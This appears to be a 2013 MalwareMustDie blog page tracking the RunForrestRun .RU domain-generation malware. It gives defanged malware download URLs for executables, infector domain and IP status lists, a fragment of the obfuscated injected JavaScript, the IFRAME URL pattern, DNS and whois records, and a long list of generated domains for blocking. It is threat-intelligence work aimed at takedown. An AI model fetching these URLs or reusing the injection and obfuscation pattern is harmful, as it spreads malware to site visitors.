0 / 6 [119]hxxp://uphinjaq.ru/rasta01.exe Ukraine 31.170.137.75
0 / 6 [120]hxxp://xaplovav.ru/rasta01.exe Ukraine 93.79.113.101
0 / 6 [121]hxxp://aziwolge.ru/rasta01.exe Ukraine 93.79.2.115
0 / 6 [122]hxxp://uphinjaq.ru/rasta01.exe Taiwan 114.25.156.106
0 / 6 [123]hxxp://xaplovav.ru/rasta01.exe Japan 123.225.106.205
0 / 6 [124]hxxp://oktizsez.ru/rasta01.exe Taiwan 111.252.191.134
0 / 6 [125]hxxp://kiyvryhy.ru/rasta01.exe Taiwan 124.11.195.73
0 / 2 [126]hxxp://sisvizub.ru/rasta01.exe Belarus 178.124.179.118
0 / 2 [127]hxxp://lymimnib.ru/rasta01.exe Ukraine 37.229.38.92
0 / 6 [128]hxxp://fugegwyf.ru/rasta01.exe Ukraine 159.224.94.242
0 / 2 [129]hxxp://fugegwyf.ru/rasta01.exe Russian Federation
0 / 2 [130]hxxp://urxibzep.ru/rasta01.exe Latvia 79.135.142.166
0 / 6 [131]hxxp://cibowjuv.ru/rasta01.exe Japan 219.173.80.25
0 / 6 [132]hxxp://pedtokid.ru/rasta01.exe Ukraine 188.231.173.99
0 / 2 [133]hxxp://bawoxgud.ru/rasta01.exe Ukraine 188.231.173.99

// grep userid*

0 / 3 [7]hxxp://131.155.81.158/userid2.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/userid2.exe Ukraine 89.252.33.161
0 / 2 [9]hxxp://ikqydkod.ru/userid2.exe Ukraine 178.137.38.18
0 / 1 [10]hxxp://ikqydkod.ru/ruserid2.exe Ukraine 176.8.183.137
0 / 6 [11]hxxp://xudsahbu.ru/userid2.exe Colombia 186.99.248.89
0 / 6 [12]hxxp://dypqysro.ru/userid2.exe Ukraine 212.79.121.221
0 / 6 [13]hxxp://uhipyvob.ru/userid2.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://jyuhysdo.ru/userid2.exe Ukraine 46.119.129.244
0 / 6 [15]hxxp://runevfoh.ru/userid2.exe Ukraine 46.211.249.42
0 / 6 [16]hxxp://hupjiwuc.ru/userid2.exe Ukraine 78.30.193.176
0 / 7 [17]hxxp://busasxyv.ru/userid2.exe Russian Federation 2.94.27.238
0 / 6 [18]hxxp://cypseguv.ru/userid2.exe Taiwan 124.12.91.243
0 / 3 [19]hxxp://78.83.177.242/userid2.exe Bulgaria 78.83.177.242
0 / 7 [20]hxxp://runevfoh.ru/userid2.exe Japan 123.176.141.183
0 / 6 [21]hxxp://confikja.ru/userid2.exe Ukraine 212.2.153.131
0 / 6 [22]hxxp://runevfoh.ru/userid2.exe Belarus 93.191.99.97
0 / 6 [23]hxxp://confikja.ru/userid2.exe Belarus 37.215.114.92
0 / 2 [24]hxxp://confikja.ru/userid2.exe Ukraine 109.87.181.75
0 / 6 [25]hxxp://tofhermi.ru/userid2.exe Ukraine 109.87.83.108
0 / 1 [26]hxxp://fafehwiz.ru/userid1.exe Ukraine 178.151.63.5
0 / 6 [27]hxxp://ybtoptag.ru/userid2.exe Ukraine 94.153.63.166
0 / 2 [28]hxxp://qeisybyg.ru/userid2.exe Russian Federation
0 / 2 [29]hxxp://mihumcuf.ru/userid2.exe Ukraine 77.122.68.176
0 / 1 [30]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.154.33.114
0 / 1 [31]hxxp://ollopdub.ru/userid1.exe Taiwan 114.27.25.145
0 / 1 [32]hxxp://fafehwiz.ru/userid1.exe Ukraine 159.224.8.181
0 / 1 [33]hxxp://ollopdub.ru/userid1.exe Ukraine 92.52.177.41
0 / 1 [34]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.45.106.206
0 / 1 [35]hxxp://ollopdub.ru/userid1.exe Ukraine 109.162.41.226
0 / 1 [36]hxxp://fafehwiz.ru/userid1.exe India 49.206.161.32
0 / 1 [37]hxxp://pywudcoz.ru/userid1.exe Ukraine 93.78.79.28
0 / 1 [38]hxxp://ollopdub.ru/userid1.exe Hong Kong 223.19.195.162
0 / 1 [39]hxxp://ollopdub.ru/userid1.exe Ukraine 46.185.34.216
0 / 1 [40]hxxp://pywudcoz.ru/userid1.exe Russian Federation
0 / 1 [41]hxxp://hiznizoc.ru/userid1.exe Ukraine 87.244.169.104
0 / 1 [42]hxxp://ollopdub.ru/userid1.exe Macedonia 146.255.91.19
0 / 1 [43]hxxp://hiznizoc.ru/userid1.exe Ukraine 176.36.152.60
0 / 1 [44]hxxp://ollopdub.ru/userid1.exe Ukraine 37.143.93.132
0 / 1 [45]hxxp://kosnutef.ru/userid1.exe Ukraine 176.111.35.196
0 / 6 [46]hxxp://acaqizwy.ru/userid1.exe Taiwan 61.227.163.213
0 / 2 [47]hxxp://lymimnib.ru/userid1.exe Ukraine 176.103.208.105
0 / 2 [48]hxxp://sisvizub.ru/userid1.exe Ukraine 178.150.212.143
0 / 3 [49]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [50]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [51]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 2 [52]hxxp://ankoweco.ru/userid1.exe Poland 79.135.180.94
0 / 2 [53]hxxp://uxmadjox.ru/userid1.exe Poland 86.63.98.141

---
#MalwareMustDie! $ date
Tue Jul 16 22:14:11 JST 2013

The domain list and UP IP's as per Fri Jul 19 20:01:00 JST 2013 status during the shutdown process

uhipyvob.ru,178.150.17.118,
ollopdub.ru,176.8.3.144,
fafehwiz.ru,91.217.58.74,
fuhxodyz.ru,77.122.197.86,
ikqydkod.ru,37.229.144.253,
bopefidi.ru,118.34.132.154,
ycsycxyd.ru,95.140.214.250,
sojouvyc.ru,188.129.218.87,
vadlubiq.ru,178.93.135.94,
kazlyjva.ru,109.162.94.114,
funfubap.ru,213.37.166.193,
goryzcob.ru,213.37.166.193,
motbajsi.ru,178.158.158.182,
xymkapaq.ru,93.185.219.213,
runevfoh.ru,89.215.115.4,
virerceb.ru,94.153.36.164,
xatzyjha.ru,93.79.152.211,
makgivus.ru,79.135.211.87,
avryjpet.ru,178.211.105.168,
kyjaqcoz.ru,46.119.144.106,
hiznizoc.ru,46.250.7.179,
giktyxvu.ru,77.123.79.211,
ynhazcel.ru,178.172.246.30,
gazgowry.ru,93.89.208.202,
vetarwep.ru,5.248.164.41,
gulaxxax.ru,46.119.144.106,
onhugxic.ru,109.251.126.26,
ahfamzyk.ru,46.49.47.254,
sykevked.ru,93.77.96.252,
ydhicdor.ru,94.137.172.44,
kifectah.ru,109.122.40.111,
busasxyv.ru,77.121.199.73,
yjnaqwew.ru,77.121.255.183,
xuktalez.ru,91.123.150.115,
lygyucce.ru,94.158.74.230,
taykenid.ru,109.108.252.136,
bysjyhuf.ru,5.1.22.63,
najniner.ru,126.65.174.136,
dakacdyn.ru,109.254.67.25,
higrikpy.ru,78.154.168.74,
dipteqna.ru,188.190.75.232,
kykywpik.ru,109.122.33.79,
cimmitic.ru,153.180.71.144,
suyzerew.ru,217.196.171.35,
yhzelbyp.ru,77.123.80.174,
aflyzkac.ru,93.185.220.213,
tejjetzo.ru,93.89.208.202,
lysopzoh.ru,178.168.22.114,
dyvgigim.ru,46.211.75.123,
jehrecyp.ru,87.69.55.36,
cyrkapov.ru,190.220.70.79,
niqtasoz.ru,178.150.17.118,
ginkyvub.ru,77.123.80.174,
zyvjofat.ru,93.79.152.211,
ihurvyun.ru,94.231.190.74,
izytexuf.ru,31.192.237.101,
adtyuhuz.ru,84.252.56.59,
aggaxsef.ru,94.230.201.36,
bomuxvis.ru,84.240.19.130,
xejabfom.ru,178.158.186.24,
sapigrys.ru,95.69.187.249,
sodkanxo.ru,117.197.245.69,
paxgeqjo.ru,49.205.210.193,
xoqhozaz.ru,95.160.83.57,
usfezhyk.ru,46.119.212.183,
hipahsah.ru,109.87.200.213,
talozzum.ru,31.133.52.8,
yrupxyen.ru,91.224.168.65,
nacwoman.ru,178.150.90.223,
libcikak.ru,46.119.128.115,
uphinjaq.ru,109.162.9.212,
aziwolge.ru,178.150.17.118,
oktizsez.ru,78.139.153.169,
kiyvryhy.ru,79.133.254.238,
fugegwyf.ru,188.190.75.232,
urxibzep.ru,91.225.173.12,
cibowjuv.ru,, // down
pedtokid.ru,, // down
bawoxgud.ru,31.133.55.240,
xudsahbu.ru,195.24.155.245,
dypqysro.ru,31.170.137.75,
jyuhysdo.ru,78.154.168.74,
hupjiwuc.ru,188.121.198.247,
cypseguv.ru,176.8.249.131,
confikja.ru,93.171.77.37,
tofhermi.ru,36.224.71.20,
ybtoptag.ru,180.61.12.116,
qeisybyg.ru,77.122.124.210,
mihumcuf.ru,93.185.220.213,
pywudcoz.ru,89.201.116.227,
kosnutef.ru,79.164.250.218,
acaqizwy.ru,178.150.244.54,
lymimnib.ru,117.197.15.103,
sisvizub.ru,89.28.52.30,
ankoweco.ru,, // down
uxmadjox.ru,, // down
hozfezbe.ru,178.210.222.205,

Again, we thank you to all friends, entities and support for your great cooperation and advise. Analysis and spotting a threat is one thing, but the hardest part is to make the threat goes down, better yet to put the crime responsible individuals to pay what they deserved.

MalwareMustDie will continue every effort to dismantle malware from internet and providing every crime evidence found to the related authority. Your help and support on every investigationwill be very appreciated.

Public announcement by #MalwareMustDie, NPO., 2013. All rights reserved.
Anti CyberCrime Research Group - malwaremustdie.org

Read More

The come back of the .RU RunForrestRun's DGA with 365 domains infector (ALIVE!)

I came into infection site spotted in Japan network as per snapshot below:

Which is a site to guide and introduce works for the lady workers, and that site is having infection of the obfuscation code of the RunForrestRun a DGA .RU domain-base malware infection. We are having experiences with this DGA from the day one we started malwaremustdie, so if you search for RunforrestRun keyword in our blog you'll see many result like this -->>[Google Search Result].

By successfully shutdown and stopping those infection cases in the past, using the knowledge we gathered, as a reference to share we released a public guide line for handling DGA cases as per posted in our Google Code here-->>[GoogleCode]

After a while we didn't see the activity of these infector, until yesterday accidentally saw the same infector once more. We posted this findings and how to decode this in our twitter announcement here:

#MalwareMustDie friends, the #DGA of RunForrestRun 「.RU」is back, https://t.co/OGMQLvYGZY can be cracked using our guide in Blog & GoogleCode

— MalwareMustDie, NPO (@MalwareMustDie) July 22, 2013

The obfuscation code

There are some changes in the infector we spotted now, practicaly the randomization logic is slightly improved, and double obfuscation used is using a "blackhole" style of encoding javascript. The obfuscation itself was encoded by two layer encoding stages, we saw soe similar encoding style of these in the infected sites which lead to Blackhole or Cool Exploit Kit, suggested a co-relation between those cases (i.e.: they purchased the encoding service). The decoding steps can be viewed in our pastebin here-->>[PASTEBIN]

If we see the front encoded method, the one we saw injected in hacked site, it has the below structure:

If you see the typical tag used for encoded part (red color), it was wrapped within the script tag (purple color) and the JavaScript's String.fromCharCode method was used for decoding the long obfuscation data between those tags.

Just run the above code in any JS simulator we'll get the real obfuscation code. The hexed code we paste in pastebin link (mentioned above) too. By feeding the obfuscation long data into the logic below:

document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? 

..it stores those data into document object to be decoded in the below generator:

Which (the red color) shows the deobfuscation logic and the purple color shows the "eval" method used to extract the decoded value.

Finally we came into the final deobfuscated result which is the core of the "RunForrestRun" infector domain randomization logic itself. In this version, the randomization code I separated into three parts, the seeds, calculation part, and formulation logic, as per below breakdown:

And the result will be written as IFRAME in of the .RU urls of:

"h00p://" + domainName + ".RU/ｒunforestｒun?ｓid=boｔnet2"

As per below code states:

The infector domain and current status

Our friend, Mr. Darrel Rendell helped to extract the .RU infector domains based on time input to the random logic as per he tweeted below:

@Secluded_Memory @unixfreaxjp @malm0u53 @Trojan7sec DGA dump is here http://t.co/PTWw04WfE0 #MalwareMustDie!

— Darrel Rendell (@DarrelRendell) July 23, 2013

The result is very good seperated by the function of dates within a year of cycle of the extracted 365 domains, which can be viewed here-->>[PASTEBIN] < With thank you for the help on this.

I just checked the current ALIVE of the extracted domains using our beloved tool which we share it here-->>[GoogleCode] and found the current domains ARE UP & ALIVE as per below list:

bumggasfaoywfncc.ru,195.22.26.231,
vvteeuevhpbpepfi.ru,91.233.244.102,
ijxsncuprepwqzlt.ru,91.233.244.102,
knuidyekzkyuhtpi.ru,91.233.244.102,

You can see the check PoC that I performed in our paste here-->>[MMD Pastebin]
The other way to check whether these domains alive or not is via root DNS it self, I pick the first domain and search/trace it records in DNS now and found it alive:

Tracing to bumggasfaoywfncc.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
 |\___ a.dns.ripn.net [ru] (193.232.128.6)
 |     |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) Got authoritative answer
 |      \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) Got authoritative answer
 |\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
 |\___ b.dns.ripn.net [ru] (194.85.252.62)
 |     |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
 |      \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
 |\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
 |\___ d.dns.ripn.net [ru] (194.190.124.17)
 |     |\___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
 |      \___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
 |\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
 |\___ e.dns.ripn.net [ru] (193.232.142.17)
 |     |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
 |      \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
 |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
  \___ f.dns.ripn.net [ru] (193.232.156.17)
       |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
        \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)

The below is the current URLQuery report of the four alive .RU infector URLs/domains above to check the HTTP response, the thank's to URLQuery for its "on-the-record" feature:
http://urlquery.net/report.php?id=3952242
http://urlquery.net/report.php?id=3952365
http://urlquery.net/report.php?id=3952414
http://urlquery.net/report.php?id=3952290
The 3 domains above replied with the IP of 91.233.244.102 is currently an active domains which can be proved by the whois data below:

domain:        VVTEEUEVHPBPEPFI.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.04.15
paid-till:     2014.04.15
free-date:     2014.05.16
source:        TCI
Last updated on 2013.07.24 01:36:36 MSK

domain:        IJXSNCUPREPWQZLT.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.04.15
paid-till:     2014.04.15
free-date:     2014.05.16
source:        TCI
Last updated on 2013.07.24 01:36:36 MSK

domain:        KNUIDYEKZKYUHTPI.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2012.11.06
paid-till:     2013.11.06
free-date:     2013.12.07
source:        TCI
Last updated on 2013.07.24 01:36:36 MSK

As per seen in the above data, the REGGI.RU registrar was tricked/abused somehow to let these domains entering internet. Later on we know that one domain left was sinkholed in 195.22.26.231.
We also learned that the abuse type of registration in Russia registrar always show the status of REGISTERED, DELEGATED, UNVERIFIED just as per stated in the above active domains. This information is very important to follow the shutdown process further.

The conclusion

This DGA is ALIVE and harmful. Please block these domains for it is proven ALIVE.
The usage of these DGA will not be good, so no further verdict needed from our side.
Our friend Conrad Longmore, from Dynamoo Blog also suggest all of us to block IP: 91.233.244.102 as per recorded many malicious activities found in this IP, as per following his tweet:

@MalwareMustDie @DarrelRendell @malm0u53 Lots of bad things on 91.233.244.102 http://t.co/KxwNwgIaQ6

— Conrad Longmore (@ConradLongmore) July 23, 2013

For the conveniences of the dismantling purpose we pasted also the list of domains we decoded from this DGA below, sorry for taking so much space for this report:

kxfcnwlyyohascji.ru
wjikjkybqouienfm.ru
jwkynwfxjqdqqmji.ru
vjnhblgryauqcpmr.ru
iwoughjskqxnoury.ru
tirdttcivfplnrds.ru
gwtrhozqbvudulyl.ru
siwafwlsbplqrxly.ru
fvxordgblagqooqx.ru
rhbyvkanoqokqyit.ru
evdmudjenjokhgmz.ru
phgunkwwcglepbdc.ru
cuijmuljysivscwe.ru
oglrzlxpvxfhgihb.ru
bumggasfaoywfncc.ru
ngpormkfmmcfgysb.ru
yrqwbnjqbnfhpbuu.ru
lguktmilemdssbyx.ru
xrvstpmjbtxnttxd.ru
kfzhvfgdfixkfdrr.ru
wqbrmmqhlkusiixa.ru
jfegifyhkbjxfflc.ru
uqfnewvxvyvsrxuk.ru
hejcagnpfrpnqefc.ru
tqkkpnnamkpqnyym.ru
genyzeyokjwxykzm.ru
spphczekzysdypqb.ru
fdsvrfljfaskbylv.ru
qptetotipsmswbqw.ru
ddxrlumbiwovldwg.ru
poyalyqorovwqves.ru
ntppvruxnkdjhvbh.ru
zgsxmhffvnizvxft.ru
mtuloilstrcfoykq.ru
yfxueilamhutmmnr.ru
ksyiaulnbpgnxpjs.ru
wfcsvebxgiynxlbc.ru
jsehchxfgboukksb.ru
vehpowijritygngg.ru
isjdecxytkoiazad.ru
uemmazcuvorvsadb.ru
grnzukxvhqnjfana.ru
sdqirxitzjgxxxhf.ru
frswwkcwyjwmrorb.ru
rdvfkzvdqxpufsep.ru
eqxsyluecdcxpped.ru
qdbewgrvhvwygvlo.ru
cqcrrdgweomwshmp.ru
ocfaopqtguzswofi.ru
bpholidutrkjmtpp.ru
nckwyplkpfqczmxl.ru
znlfqprdgejpllxi.ru
mbosgirfmfoygmhk.ru
xnqbiapjqcpvvcqz.ru
kbtpctegrcuillhc.ru
wmuxxiagzhcieofr.ru
jaymuwnpcjtqcwot.ru
vmzukuabemehxwpw.ru
hzbkqtgarqrmdlcx.ru
qqafbwfwjrflbmdo.ru
deeskswjfulkurjc.ru
ppfbslcowvdivwmr.ru
cejpdwxlftekbrch.ru
npkxjvsffuotzmij.ru
adnmvxwbyzjwvasg.ru
moouumrwtvnetzfu.ru
ybrdscaecknwugpu.ru
lotqnwonxpgigjox.ru
xawyilvvdurtcltc.ru
joynyhkerylsfygl.ru
vzzvoqbscqsnmrqr.ru
indlredwgvungvsq.ru
uyethhnsehcfqilz.ru
hniitysuwprckvzs.ru
syjqyvrpyohlexgj.ru
fmmflppopijsipdr.ru
ryonlorhvoekruec.ru
emrbflbunrcqrjgk.ru
qxsjdyodxeyyechp.ru
dlwxvurpfeyqyqcj.ru
oxxguneutbrhtsjx.ru
blbwpvcyztrepfue.ru
nwcenehdgqyxtssq.ru
zjfndnhwdsrwephi.ru
mwhbjgismatmjuji.ru
yikkpeqinkedjnxs.ru
kvmxjgblbhjgpjvw.ru
wipgnmjxfgwttrlf.ru
jvqtbrrbikxribjl.ru
vhtdynyciknmkblg.ru
tmlrjxvvrvkyxofn.ru
gbogvuamqydsxcgz.ru
smpovxvnxkelrgzt.ru
eatdfntzfgqrprmj.ru
qlulnseexvzpptcm.ru
dzvyrlqebdcolbei.ru
plzhfkuhkocvqwvx.ru
cybxcikisigkmqtl.ru
olegrpgtdxosnnkc.ru
aygtmclwegxsmjid.ru
mkjdkbwuxcnuxtqd.ru
yvklttrmfvygrvwk.ru
lknyzylpjzkasnmo.ru
xvphlknpxewklsyd.ru
kjsvlbwoxhcbtfpq.ru
vvteeuevhpbpepfi.ru
ijxsncuprepwqzlt.ru
uuyavjatmoykgodf.ru
hicqgipogsjulrgn.ru
tudygcklurkthcmt.ru
gihnijebfitftukm.ru
rtivxqoindugifaf.ru
ehmjatkmhnivwxdo.ru
qtnrpbmfuierqstw.ru
dhqgdpbdxrusdxcw.ru
psroiljvwkqrnfqf.ru
bhvdnklorkjcfppd.ru
nswltcjxwwnbrljp.ru
agabgtdhgsbspwsq.ru
mrcjwchanjuilitl.ru
yefscrehgfveysyc.ru
wjvftsujnszcvevs.ru
jwwtixcvymcflhob.ru
vibeglyuxuzbkgbo.ru
hwcrlxhvrevsnzwl.ru
tifbsmujkhbvbkyj.ru
gvhodonxvblrghch.ru
shkwimusoizncvhx.ru
fvllwtyeleporhen.ru
rhotamrrectjqfto.ru
duqhgptpqmsyyrqj.ru
phtqmnbhcmyknyss.ru
cuveztrnrgnshbgp.ru
ogymeohrjxfscgfs.ru
btacsqzlgctcxjei.ru
mgdlwkvcgkygcqck.ru
yretgeoqsvdnikar.ru
lfihodgqdjmfqppt.ru
xrjpymuxzutqaudg.ru
kfnebggkwsjlxzbk.ru
wqomqwbvtwiwejid.ru
ierbdycqkclubnex.ru
uqsiihfbyeotruuc.ru
hewwcxblormskqae.ru
tpxfuxwvnqcmekoi.ru
gdbvudwhpnuwrdls.ru
spdenojggmdrlixc.ru
edgsojssutkqjbxg.ru
qohaffgzdpnksohx.ru
ddloyfnurjprfwnb.ru
pomwopzpscwqxpfv.ru
zfguwvhdmjlutvwo.ru
mtiidqbknpskzasp.ru
xflrjyyjswoatsoq.ru
ksmfflbpefxgfdsv.ru
wepnhoeeodiklyar.ru
jsrcwahdmdarwmto.ru
veukmrlhkghlqqjn.ru
irwxwuybkwltqnhx.ru
tezhfswbxfnnuhbd.ru
grbwyglkgkieiybk.ru
sdefwonjqnujdoxr.ru
fqgtjwvcrkmuhkco.ru
rdjcjrxljzaughvt.ru
eqkplxtjjuhkbeqs.ru
pcoyyxsfhsyysfme.ru
cppmejjneikodxrc.ru
ocsuqiqvvknfvcjp.ru
bpujwsmplvftnqcx.ru
nbxrjalwllvnbmfs.ru
znyzszkdrxgnovuq.ru
lbcpvpxigyferhws.ru
xmexlajhysktwdqe.ru
kahmnunornwrgpgb.ru
wmiudbgrcvapriql.ru
jzkitejvrxgkgpgi.ru
ulnrpbudycxzdlkt.ru
hyoflopkupjioiqq.ru
tlrnhskrgijhwtlj.ru
gytcnulxsxpsqkfn.ru
skwkybckmywhrhbb.ru
dernflilrdxmfnye.ru
ppsvcvrcgkllplyn.ru
bdvkpbuldslsapeb.ru
npxsiiwpxqqiihmo.ru
adbjjkquyyhyqknf.ru
mocrafrewsdjztbj.ru
yafzvancybuwmnno.ru
lohnrnnpvvtxedfl.ru
wakvnkyzkyietkdr.ru
jnlkttkruqsdjqlx.ru
vznrahwzgntmfcqk.ru
inqgvoeohpcsfxmn.ru
uyrorwlibbjeasoq.ru
gmvdnpqbblixlgxj.ru
sywleisrsstsqoic.ru
fmacqvmqafqwmebl.ru
rxbkqfydlnzopqrn.ru
elfxqghdubihhsgd.ru
qxggipnnfmnihkic.ru
clkujrjqvexvbmoi.ru
owldagkyzrkhqnjo.ru
blorcdyiipxcwyxv.ru
nwpykqeizraqthry.ru
zisiiogqigzzqqeq.ru
mvuvchtcxxibeubd.ru
xixftoplsduqqorx.ru
kvzstpqmeoxtcwko.ru
whddmvrxufbkkoew.ru
jveqgnmjxkocqifr.ru
vhhzcvbegxbjsxke.ru
iujniiokeyjbmerc.ru
gacdiuwnhonuulpe.ru
rmdlgyreitjsjkfq.ru
ezfydrexncoidbus.ru
qlihxnncwioxkdls.ru
dyjvewshptsboygd.ru
plmekaayiholtevt.ru
cyosongjihugkjbg.ru
nkrbvqxzfwicmhwb.ru
axtopsbtntqnfdyk.ru
mkwwclogcvgeekws.ru
yvxfekhokspfuwqr.ru
ljbvfrsvcevyfhor.ru
xvcewyydwsmdgaju.ru
jjgshrjdcynohyuk.ru
vuhaojpwxgsxuitu.ru
iiloishkjwvqldlq.ru
uumwyzhctrwdsrdp.ru
hiplksflttfkpsxn.ru
ttqtkmthptxvwiku.ru
fhuidtlqttqxgjvn.ru
rtvqcdpbqxgwnrcn.ru
ehyewyqydfpidbdp.ru
qsbourrdxgxgwepy.ru
dhedppigtpbwrmpc.ru
osflhkaowydftniw.ru
bgjzhlasdrwwnenj.ru
nrkhysgoltauclop.ru
zenquqdskekaudbe.ru
mroeqjdaukskbgua.ru
ydrngsmrdiiyvoiy.ru
krtbityuhlewigfe.ru
jwkpdxqbemsmclal.ru
uinyjmxfqinkxbda.ru
hvpmffxpfnlquqxo.ru
tisubmfvqrgnloxr.ru
gvujhzvjxwptrtdg.ru
shxrsvasoncjnxpn.ru
fuyfrockpfclxccd.ru
qhcplcuugevvyham.ru
dueebwwdllfburag.ru
pghnrmkoeoetfwsm.ru
ctjbmgjudwisgshv.ru
ogmjjmqdhlbyabzg.ru
atnwerhvttvbivra.ru
mfqfrnqllqcrayiw.ru
yrrnrgliojezjctg.ru
lfvcngdbzjrzgyby.ru
xqwkdyjydkggsppd.ru
keabgwmpzqhpmlng.ru
vqcicnuhtwhxmtjd.ru
iefwvulgninlkoxe.ru
upgghggmbusopaxv.ru
hektxucstnbuncix.ru
tplczomvebjmhsgk.ru
gdoqznfilmtulxxv.ru
ropypfmcqjjfdiel.ru
edtmjcvfnfcbweed.ru
qouubrmdxtgnnjvm.ru
dcyjurmfwhgvyoio.ru
pozrtgdmhvhvdscn.ru
ccdifvomwhtynpay.ru
nneplwlvlcojiegm.ru
lsvdxjpwykxxvryd.ru
xfymtpavzblzbknq.ru
ksacasnubklrikdl.ru
wedkgpdcxlrunbmu.ru
jrfyaswntteouafv.ru
veihxoqukuetxqbn.ru
hrkusbnevtmyisab.ru
tdndpphrtyniynvz.ru
gqortbbbsnksxpmm.ru
sdrzgpowhyckaogu.ru
fqtooihtbhwdxskt.ru
rcwwrqssqrrfpgvd.ru
dpxkgybdgttbeyfh.ru
pcbukgjlihpvehyu.ru
cpdjalvpsvfgqtbd.ru
obgrcxuqunmquthx.ru
bpifbqdpzavdjljq.ru
nbloiroucuvotnck.ru
ymmwxgaimxgqtrdv.ru
lapkpatjbkubfxeu.ru
xmqspbcjfttkibbg.ru
kauhrjmdqenmtyvk.ru
wlvpilfxnxpdoujt.ru
jzxdofqtnlusever.ru
ulbnairmbptfscka.ru
hyccqffkdslpbuue.ru
tkfksqvkqdhspdsm.ru
gyhxgveinbdufdnt.ru
skkhxjykeyukyebl.ru
exmubcrfgpaijgzx.ru
opgsgmrejtyazcrf.ru
bdjhtgqhggicwrmy.ru
nolpsdqvivphcoew.ru
zboxoswkbebgarsh.ru
moplknnccyfkesaj.ru
yasuaexybixmvnge.ru
knuidyekzkyuhtpi.ru
wzvqmhzpppziurdl.ru
jnyfopdfycjyfomx.ru
vybofxkqmidtcnhq.ru
imedqfzemirxjqhn.ru
tyflwmgobjignmbd.ru
gmjzqviddrqumknm.ru
sxkiifqgzmsjvxzn.ru
fmnvbcuebuoyhxgq.ru
rxoebpmmwjgsphyp.ru
elsskgujckxkdqry.ru
pwtbsyitleslzngt.ru
clxpvwfqexkciciu.ru
owyxdqwgvlyndmwr.ru
bkcnxdtvxcjpyobq.ru
nwdvufzkpszkvxxk.ru
zigfmudoxbqehljf.ru
lvishxhsbgoyclva.ru
xhlbffbmicnnxpsk.ru
kvnoygvsciiyrnlp.ru
whqxutzyuwvaijbq.ru
jurlbjnqmycnjoat.ru
vhutmessbhrhonso.ru
huwiddttqzujegjk.ru
tgzqyfhfekefmnuv.ru
rlqglzqqhehmtryd.ru
eystwwslgmwxzqsu.ru
qlvcdbyuturxcusx.ru
dywqzqyouieuojub.ru
pkabphfegwhtnoug.ru
bycojtqkhamhawoj.ru
nkfxfqvofqbuhuuz.ru
axhlltpcxcixsdhv.ru
mjktxpzccvifevpc.ru
yvlcjbweeheoixyj.ru
ljoqjstmgdotqyll.ru
wupyyjwqhozwdpcb.ru
jitnlsxlmbtdzmwf.ru
vuuurusnjxorennj.ru
iiyjdtxigdyuyzcz.ru
utzrdmsexiffrltv.ru
hidifzbettjuadfh.ru
steqvhuhrqsmynoh.ru
fhifzexvhegcjtdx.ru
rsjmnrjedkuvhwfs.ru
ehmbrpusljbmykrn.ru
qsojzcltslhstxnj.ru
dgrxbomayxjhdike.ru
ossgrsfecodjxjhy.ru
bgwutpbwpbcrzthd.ru
nrxcdfhydmlcnoay.ru
zdbnzonswqhjphqh.ru
mrcblkrgikgxxtwc.ru
xdfjryydcfwvkvui.ru
kqhxgmvevducviey.ru

#MalwareMustDie!

Read More